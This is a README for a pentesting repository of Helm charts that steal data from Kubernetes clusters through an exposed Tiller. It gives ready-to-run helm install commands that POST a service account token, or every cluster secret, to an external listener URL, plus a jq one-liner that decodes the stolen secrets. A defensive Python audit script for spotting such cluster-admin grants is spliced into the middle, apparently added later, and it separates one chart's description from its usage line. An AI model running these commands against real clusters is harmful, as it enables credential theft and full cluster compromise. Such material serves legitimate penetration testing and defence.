ropnop/pentest_charts
About

These are a few Helm charts I've made to help exfiltrate data or escalate privileges when you're inside a Kubernetes cluster and have access to Tiller, but not to the Kubernetes API.

For more information, see my blogpost about attacking Tiller from inside a cluster: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

Charts

To use these charts, you must first initialize Helm, then you can install the charts directly from the repo:

$ helm init --client-only
$ helm install --repo https://ropnop.github.io/pentest_charts/ <chart_name> [options]

exfil_sa

This chart deploys a job designed to simply POST the pod's service account token to a URL. This is useful if you have access to Tiller and know a specific service account whose token you'd like to steal. It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName=tiller --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" --repo https://ropnop.github.io/pentest_charts exfil_sa_token

This will POST the token in the body of an HTTP request to exfilURL.

To clean up: helm delete --purge <release_name>

exfil_secrets

This chart creates a new service account with cluster-admin privileges, then deploys a job with that new service account to read all the secrets in every namespace from the Kubernetes API and POST the data back to an exfilURL.

It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the name of the new cluster-admin service account the chart creates and the job runs as
  • exfilURL - the URL to POST the secrets to. Make sure you have a listener on that URL to catch them! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it
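From a defender's side, the objects this chart leaves behind are auditable: a ClusterRoleBinding that grants cluster-admin to a service account, and a Job whose pod runs as that service account. The following script is an added example, not part of ropnop/pentest_charts or of the charts themselves. It assumes the standard list shapes returned by `kubectl get clusterrolebindings -o json` and `kubectl get jobs -A -o json`; the baseline set of expected cluster-admin service accounts and the sample objects it checks are constructed for illustration.

```python
"""Audit helper: flag service accounts bound to the cluster-admin ClusterRole
that are not on an expected baseline, and any Jobs running as them.
Added example for this README; not part of the pentest_charts project."""

import json
import sys

# Constructed baseline (hypothetical): service accounts an operator already
# knows hold cluster-admin, e.g. Tiller's own service account.
EXPECTED_CLUSTER_ADMIN_SAS = {("kube-system", "tiller")}


def cluster_admin_service_accounts(crb_list):
    """Return {(namespace, name)} of ServiceAccount subjects bound to cluster-admin."""
    found = set()
    for crb in crb_list.get("items", []):
        ref = crb.get("roleRef", {})
        if ref.get("kind") != "ClusterRole" or ref.get("name") != "cluster-admin":
            continue
        # 'subjects' may be absent or null on a binding with no subjects
        for subj in crb.get("subjects") or []:
            if subj.get("kind") == "ServiceAccount":
                found.add((subj.get("namespace", "default"), subj["name"]))
    return found


def jobs_running_as(job_list, sa_set):
    """Return [(namespace, job_name, service_account)] for Jobs whose pod
    template uses one of the service accounts in sa_set."""
    hits = []
    for job in job_list.get("items", []):
        ns = job["metadata"]["namespace"]
        pod_spec = job["spec"]["template"]["spec"]
        # A pod with no serviceAccountName runs as the namespace's 'default' SA
        sa = pod_spec.get("serviceAccountName", "default")
        if (ns, sa) in sa_set:
            hits.append((ns, job["metadata"]["name"], sa))
    return hits


def audit(crb_list, job_list, baseline=EXPECTED_CLUSTER_ADMIN_SAS):
    """Cross-reference bindings and jobs; anything outside the baseline is reported."""
    admins = cluster_admin_service_accounts(crb_list)
    unexpected = admins - baseline
    return {
        "unexpected_cluster_admin_sas": sorted(unexpected),
        "jobs_using_them": sorted(jobs_running_as(job_list, unexpected)),
    }


# Constructed sample input mimicking the API list objects (not real cluster data).
SAMPLE_CRBS = {"items": [
    {"metadata": {"name": "cluster-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
    {"metadata": {"name": "tiller"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "tiller", "namespace": "kube-system"}]},
    {"metadata": {"name": "tiller-deployer"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "tiller-deployer", "namespace": "kube-system"}]},
    {"metadata": {"name": "readonly"},
     "roleRef": {"kind": "ClusterRole", "name": "view"},
     "subjects": [{"kind": "ServiceAccount", "name": "reader", "namespace": "default"}]},
]}
SAMPLE_JOBS = {"items": [
    {"metadata": {"name": "tiller-deployer", "namespace": "kube-system"},
     "spec": {"template": {"spec": {"serviceAccountName": "tiller-deployer"}}}},
    {"metadata": {"name": "nightly-backup", "namespace": "default"},
     "spec": {"template": {"spec": {}}}},
]}


if __name__ == "__main__":
    # Usage: python audit.py clusterrolebindings.json jobs.json
    # With no arguments the constructed sample data is used.
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as f1, open(sys.argv[2]) as f2:
            result = audit(json.load(f1), json.load(f2))
    else:
        result = audit(SAMPLE_CRBS, SAMPLE_JOBS)
    print(json.dumps(result, indent=2))
```

Running it against the sample data reports the `tiller-deployer` service account as an unexpected cluster-admin binding and the Job that runs as it; the `view` binding and the Job using the namespace's default service account are not reported. In practice the baseline set is the part worth maintaining, since a cluster-admin grant to a service account is rarely legitimate outside a small, known list.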

Usage:

helm install --name tiller-deployer --set serviceAccountName="tiller-deployer" --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" --repo https://ropnop.github.io/pentest_charts exfil_secrets

This will POST every Kubernetes secret in JSON form to the exfilURL. To parse through and quickly decode all the secrets, you can use jq:

cat all_secrets.json | jq '[.items[] | . as $secret | .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: (.value | @base64d)}]'

To clean up: helm delete --purge <release_name>

Some helpful Helm Charts for pentesters